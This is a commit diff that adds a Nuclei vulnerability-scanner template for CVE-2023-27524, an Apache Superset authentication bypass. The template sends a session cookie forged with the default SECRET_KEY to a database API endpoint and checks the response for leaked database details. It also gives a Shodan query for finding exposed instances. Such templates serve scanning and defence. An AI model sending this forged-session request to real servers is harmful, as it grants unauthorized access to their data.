Merge pull request #7125 from projectdiscovery/CVE-2023-27524

Create CVE-2023-27524.yaml
2023-04-26 08:20:16 +05:30 · 2023-04-26 08:20:16 +05:30 · 87ef94fece
parent 12b125cae4 d06cac0e21
commit 87ef94fece
1 changed files with 44 additions and 0 deletions
--- a/cves/2023/CVE-2023-27524.yaml
+++ b/cves/2023/CVE-2023-27524.yaml
@ -0,0 +1,44 @@
+id: CVE-2023-27524
+
+info:
+  name: Apache Superset - Authentication Bypass
+  author: DhiyaneshDK
+  severity: high
+  description: Session Validation attacks in Apache Superset versions up to and including 2.0.1. Installations that have not altered the default configured SECRET_KEY according to installation instructions allow for an attacker to authenticate and access unauthorized resources. This does not affect Superset administrators who have changed the default value for SECRET_KEY config.
+  reference:
+    - https://github.com/horizon3ai/CVE-2023-27524
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-27524
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:L
+    cvss-score: 8.9
+    cve-id: CVE-2023-27524
+    cwe-id: CWE-1188
+  metadata:
+    verified: "true"
+    shodan-query: html:"Apache Superset"
+  tags: cve,cve2023,apache,superset,auth-bypass
+
+requests:
+  - raw:
+      - |
+        GET /login/ HTTP/1.1
+        Host: {{Hostname}}
+        Accept: */*
+
+      - |
+        GET /api/v1/database/1 HTTP/1.1
+        Host: {{Hostname}}
+        Cookie: session=eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZEfQPg.Enz83rUqMAFfdCds7ClQzlEmScg
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '"database_name":'
+          - '"configuration_method":'
+        condition: and
+
+      - type: status
+        status:
+          - 200